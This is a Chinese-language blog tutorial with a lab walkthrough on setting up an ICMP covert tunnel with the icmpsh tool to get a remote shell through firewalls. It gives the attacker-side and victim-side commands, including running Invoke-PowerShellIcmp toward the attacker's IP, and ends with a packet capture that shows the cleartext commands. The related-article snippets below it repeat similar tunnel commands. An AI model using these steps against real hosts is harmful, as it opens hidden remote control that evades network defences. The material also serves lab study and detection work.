ICMP隐蔽隧道实现--icmpsh

最新推荐文章于 2024-01-02 19:01:38 发布
最新推荐文章于 2024-01-02 19:01:38 发布
阅读量62 收藏
点赞数
文章标签: linux 网络安全 wireshark
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75358230/article/details/134539160
版权

内部网络中的大多数系统位于防火墙和公司代理之后,以控制入站和出站流量。防火墙可以阻止反向连接并绑定TCP连接。但是大多数情况下允许ICMP通信。因此,可以将此协议用作隐蔽隧道,以便获得shell并在目标主机上远程执行命令。

icmpsh工具可以用于执行此攻击。

运行此工具时需要运行以下命令,禁用所有ICMP回显答复

sysctl -w net.ipv4.icmp_echo_ignore_all=1

该工具使用python2执行,需要下载impacket包

(使用pip2传输速度太慢了,所以就直接使用wget了)

wget https://files.pythonhosted.org/packages/16/75/b240a9a9cc435c7d5d5cc465a3038b0daad744d0355a5102ca84682640e5/impacket-0.9.19.tar.gz

 之后解压缩此文件,并cd进去

接着运行此命令:

 python2 setup.py install 

 下载时会有一些问题,比如说有时会卡在这里不动

这样的话就直接pip2这个flask包 ,看准需要下载什么版本,直接install就行了

之后要将其传输至受害机上,并做以下操作:

之后运行脚本 

Invoke-PowerShellIcmp 192.168.42.130

                                                ^   这个ip地址是攻击者的IP地址

还需要在攻击者主机上运行脚本

python2 icmpsh_m.py 192.168.42.130 192.168.42.1 

第一个ip地址是自己的ip,第二个ip地址是目标主机

ok了,我们来抓一下包  0.0

 

可以看出,明文传输,我们执行的命令被抓到了

但是我们查端口的话是什么也查不到的,只能通过抓icmp包去发现数据传输

 

THREE叁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
谢公子的博客
03-05 6090
目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道(Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相...
icmp报文_ICMP隧道
weixin_39980596的博客
11-22 178
2018年小黑考上了某三本大学的计算机专业,在骄阳似火的9月为了喝阔乐,和办宽带上网,小黑选择了前者。校园宿舍用的是CMCC网络,需要进行认证才能上百度。为了一边喝阔乐一边上网,小黑开始了折腾的不归路。下面简单的分析一哈ICMP隧道是如何建立和使用的。[1]这都是2015年的技术了~第一步:服务端启动隧道第二步:查看服务端的隧道IP、路由等信息服务端IP地址多了一个10.0.1.1,这就是咱们的隧...
icmp隧道
热门推荐
03-16 1万+
ICMP 隧道 原理 icmp报文中除了必须要有的类型、校验和等等还可以携带一定长度的可选数据,这也就是我们可以用来搭建隧道的原因,不过每次报文携带得的字节不会很多,所以有点慢。 icmpsh icmpsh是一款使用简单,而且不需要管理员权限即可运行的程序,可以较为简答的搭建隧道并同时获得目标shell 攻击机是kali, IP地址:192.168.220.129 下载icmpsh 到本地 git clone https://github.com/inquisb/icmpsh.git #下载工具 apt-
ICMP隧道
javaEE_zero的博客
11-23 240
ICMP隧道实现原理和防御方式
头歌ICMP Ping实现-封装并发送ICMP报文
01-03
ICMP Ping实现-封装并发送ICMP报文ICMP Ping实现-封装并发送ICMP报文ICMP Ping实现-封装并发送ICMP报文ICMP Ping实现-封装并发送ICMP报文ICMP Ping实现-封装并发送ICMP报文ICMP Ping实现-封装并发送ICMP报文ICMP ...
头歌ICMP Ping实现-Ping客户端创建原始套接字
01-03
ICMP Ping实现-Ping客户端创建原始套接字ICMP Ping实现-Ping客户端创建原始套接字ICMP Ping实现-Ping客户端创建原始套接字ICMP Ping实现-Ping客户端创建原始套接字ICMP Ping实现-Ping客户端创建原始套接字ICMP Ping...
头哥ICMP Ping实现-解析IP包ICMP头信息.txt
01-03
头哥ICMP Ping实现-解析IP包ICMP头信息.txt头哥ICMP Ping实现-解析IP包ICMP头信息.txt头哥ICMP Ping实现-解析IP包ICMP头信息.txt头哥ICMP Ping实现-解析IP包ICMP头信息.txt头哥ICMP Ping实现-解析IP包ICMP头信息.txt...
计算机网络教案11-ICMP和路由选择.docx
12-16
然后,教师通过板书画图和实例,讲解Tracerout程序是如何利用ICMP报文和IP报文的TTL字段实现Tracert程序的基本原理和工作流程。 三、因特网的路由选择协议(15分钟) 教师通过图例和板书画图,讲解静态路由和动态...
ICMP--Senior-development.zip_trace_vc6.0
09-20
在提供的程序中,你可以看到如何使用ICMP协议实现ping功能。 2. **Tracert(Trace Route)**:与ping不同,tracert用于跟踪数据包在网络中从源到目的地的路由。它通过发送带有不同TTL(Time To Live)值的ICMP回显...
基于ICMP隐蔽传输/隐蔽通信代码(包含实验报告+完整说明)可直接运行
05-11
使用Python编写的,基于ICMP隐蔽传输的实验代码,包含第三方依赖库以及详细的配置过程,包含详细的实验报告,有创新点,可实现Windows到Windows、Windows到Ubuntu间的隐蔽通信。也可在本地单独测试。
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 3021
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
ICMP隧道搭建
dzqxwzoe的博客
08-09 112
通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。
网络安全技术之内网安全-03-ICMP隧道
caigai5424的博客
07-10 763
icmp隧道技术,绕过防火墙限制
icmp隧道--icmpsh
ddr12231的博客
09-24 290
本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t...
icmpsh建立ICMP隧道
大方子
01-27 4786
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
ICMP隧道分析与实现
墨痕诉清风的博客
05-20 749
ICMP数据包封装过程 ICMP头部分为三个字段 type 类型 (0回应,8请求) code 代码 checksum 校验和 所以在封装ICMP报文的时候也要按顺序去封装这几个字段 其余部分三个部分为为 标识符 ( identifier ),一般填写进程 PID 以区分其他 ping 进程; 报文序号 ( sequence number ),用于编号报文序列; 数据 ( data ),可以是任意数据; ICMP协议在实际传输中数据包:
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8022
icmp隧道的利用
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
最新发布
huayimy的博客
01-02 1692
服务端(中间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网中转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT 的详细解释
06-13
```adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT``` 是一个修改 iptables 规则的命令,它的含义如下: - ```-A```:表示添加(append)一个新的规则到规则链的末尾。 - ```INPUT```:表示规则链的名称,该规则将被添加到输入规则链中。 - ```-p icmp```:表示该规则适用于 ICMP 协议。 - ```--icmp-type echo-request```:表示该规则匹配 ICMP 的 echo-request 消息,即 ping 请求。 - ```-j ACCEPT```:表示如果规则匹配,将执行 ACCEPT 操作,即允许流量通过。 因此,```adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT``` 命令将添加一个新的规则到输入规则链中,该规则将允许 ICMP 的 echo-request(ping 请求)通过防火墙。这将使得 Android 主机可以 ping 通其他主机。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值